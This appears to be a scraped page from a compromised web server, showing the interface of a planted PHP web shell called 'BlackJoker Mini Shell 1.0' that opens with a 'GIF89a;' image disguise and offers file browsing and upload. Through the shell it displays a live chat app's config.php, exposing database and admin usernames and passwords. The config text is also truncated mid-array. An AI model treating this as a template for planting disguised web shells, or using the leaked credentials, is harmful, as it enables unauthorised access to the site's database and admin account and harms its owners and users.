GIF89a; Mini Shell

Mini Shell

Direktori : /home/serb/www/livechat/php/config/
Upload File :
Current File : /home/serb/www/livechat/php/config/config.php


$config = array(

    // Database settings
    'dbHost'          => 'localhost',
    'dbPort'          => 3306,
    'dbUser'          => 'workinpr_whm',
    'dbPassword'      => 'whm@123',
    'dbName'          => 'workinpr_whm',
    // Chat application admin user
    'superUser' => 'admin',
    'superPass' => 'admin123',
    // Other (do not modify manually)

    'dbType' => 'mysql',
    'avatarImageSize' => 40,
    'defaultSettings' => array(
        'widgetTheme'            => 'widget-themes/original',
        'primaryColor'           => '#36a9e1',
        'secondaryColor'         => '#86C953',
        'labelColor'             => '#ffffff',
        'hideWhenOffline'        => false,
        'contactMail'            => '',
        'loadingLabel'           => 'Loading...',
        'loginError'             => 'Login error',
        'chatHeader'             => 'Talk to us',
        'startInfo'              => 'Please fill the following form to start the chat',
        'headerHeight'           => 55,
        'widgetWidth'            => 370,
        'widgetHeight'           => 411,
        'widgetOffset'           =>  50,
        'mobileBreakpoint'       => 550,
        'maxConnections'         => 5,
        'messageSound'           => 'audio/default.mp3',
        'startLabel'             => 'Start',
        'backLabel'              => 'Back',
        'initMessageBody'        => 'Hello, how may I help you?',
        'initMessageAuthor'      => 'Operator',
        'chatInputLabel'         => 'Write your question',
        'timeDaysAgo'            => 'day(s) ago',
        'timeHoursAgo'           => 'hour(s) ago',
        'timeMinutesAgo'         => 'minute(s) ago',
        'timeSecondsAgo'         => 'second(s) ago',
        'offlineMessage'         => 'Operator went off-line',
        'toggleSoundLabel'       => 'Sound effects',
        'toggleScrollLabel'      => 'Auto-scroll',
        'toggleEmoticonsLabel'   => 'Emoticons',
        'toggleAutoShowLabel'    => 'Auto-show',
        'toggleFullscreenLabel'  => 'Toggle fullscreen',
        'endChatLabel'           => 'End the chat',
        'endChatConfirmQuestion' => 'Are you sure?',
        'endChatConfirm'         => 'Yes',
        'endChatCancel'          => 'Cancel',
        'contactHeader'          => 'Contact us',
        'contactInfo'            => 'All operators are off-line. Use the below form to send us an e-mail with your question.',
        'contactNameLabel'       => 'Your name',
        'contactMailLabel'       => 'Your e-mail',
        'contactQuestionLabel'   => 'Your question',
        'contactSendLabel'       => 'Send',
        'contactSuccessHeader'   => 'Message sent',
        'contactSuccessMessage'  => 'Your question has been sent. Thank you!',
        'contactErrorHeader'     => 'Error',
        'contactErrorMessage'    => 'There was an error sending your question'

// Generate connection strings

$config['dbConnectionRaw_mysql'] = 'mysql:host=' . $config['dbHost'] . ';port=' . $config['dbPort'];
$config['dbConnection_mysql']    = 'mysql:dbname=' . $config['dbName'] . ';host=' . $config['dbHost'] . ';port=' . $config['dbPort'];

// Used connection strings

$config['dbConnectionRaw'] = $config['dbConnectionRaw_' . $config['dbType']];
$config['dbConnection']    = $config['dbConnection_'    . $config['dbType']];

return $config;


./BlackJoker Mini Shell 1.0